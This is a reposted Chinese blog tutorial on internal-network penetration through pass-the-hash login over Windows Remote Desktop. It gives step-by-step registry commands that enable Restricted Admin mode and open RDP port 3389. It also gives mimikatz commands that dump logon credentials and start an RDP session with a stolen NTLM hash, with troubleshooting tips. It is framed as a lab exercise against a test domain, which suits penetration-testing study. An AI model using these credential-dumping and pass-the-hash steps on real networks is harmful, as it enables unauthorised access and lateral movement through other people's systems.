内网渗透：四、windowsRDP-hash传递登录-Toy模板网

这篇具有很好参考价值的文章主要介绍了内网渗透：四、windowsRDP-hash传递登录。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

windows的RDP-hash登录利用

在渗透测试中，如果获得了某个用户的NTLM hash，我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录，对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下，如果使用hash远程登录RDP，需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。

0x01：windows RDP-受限管理模式

Restricted Admin mode简介
官方说明：
Restricted Admin mode for RDP in Windows 8.1 / 2012 R2 | Microsoft Docs
Restricted Admin mode，直译为受限管理模式，主要功能是使得凭据不会暴露在目标系统中

0x02、如何开启EDP服务indows RDP-受限管理模式：
一、安装补丁：此种方法未曾用过，不过看其他师傅的blog说原理同修改注册表一样

参考链接：
https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro

二、修改注册表

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
新建DWORD键值DisableRestrictedAdmin，值为0，代表开启;值为1，代表关闭
对应命令行开启的命令如下：
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

0x03 开启3389端口

查看RDP端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

得到连接端口为 0xd3d，转换后为 3389

windows server 2003

开启1：

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭：

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开启2：

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

windows server 2008

开启：

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

0x04、hash传递登录

客户端命令行：
mstsc.exe /restrictedadmin
如果当前系统不支持Restricted Admin mode，执行后弹出远程桌面的参数说明

内网渗透：四、windowsRDP-hash传递登录

如果当前系统支持Restricted Admin mode，执行后弹出远程桌面的登录界面

内网渗透：四、windowsRDP-hash传递登录

Restricted Admin mode使用当前Windows登录凭据，不需要输入口令，直接登录即可（Server开启Restricted Admin mode时，Client也需要支持Restricted Admin mode）

0x05、实际操作

实验环境：

Windows server 2008 作为域控制器，域为 dc.com
Windows 10 作为 dc域下的一台设备

一、mimikatz

过去windows 10 的 NTLM hash：

mimikatz.exe
    privilege::debug
    sekurlsa::logonPasswords

获取当前用户zhangsan的 NTLM hash: 73292305e32730af1b5b94022b2b2aaa

内网渗透：四、windowsRDP-hash传递登录

执行命令：

privilege::debug
sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:73292305e32730af1b5b94022b2b2aaa "/run:mstsc.exe /restrictedadmin"

内网渗透：四、windowsRDP-hash传递登录

选择连接，成功实现远程登录（此处需注意两个坑）

a、在进行远程连接时出现：远程计算机不支持受限管理模式或远程防护

内网渗透：四、windowsRDP-hash传递登录

这总共有两种情况（计算机开启远程连接的情况）：

1：目标计算机不允许其他计算机远程协助该台计算机

内网渗透：四、windowsRDP-hash传递登录

2、本地计算机注册表问题，具体参考上述开启方法

b、服务端为win10或win7等个人pc操作系统时，通过NTLM hash登录后，无法进入桌面

提示由于安全策略被阻止

内网渗透：四、windowsRDP-hash传递登录文章来源地址https://www.toymoban.com/news/detail-468826.html

到了这里，关于内网渗透：四、windowsRDP-hash传递登录的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

内网渗透：四、windowsRDP-hash传递登录

windows的RDP-hash登录利用

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

支付宝扫一扫领取红包，优惠每天领

二维码1

二维码2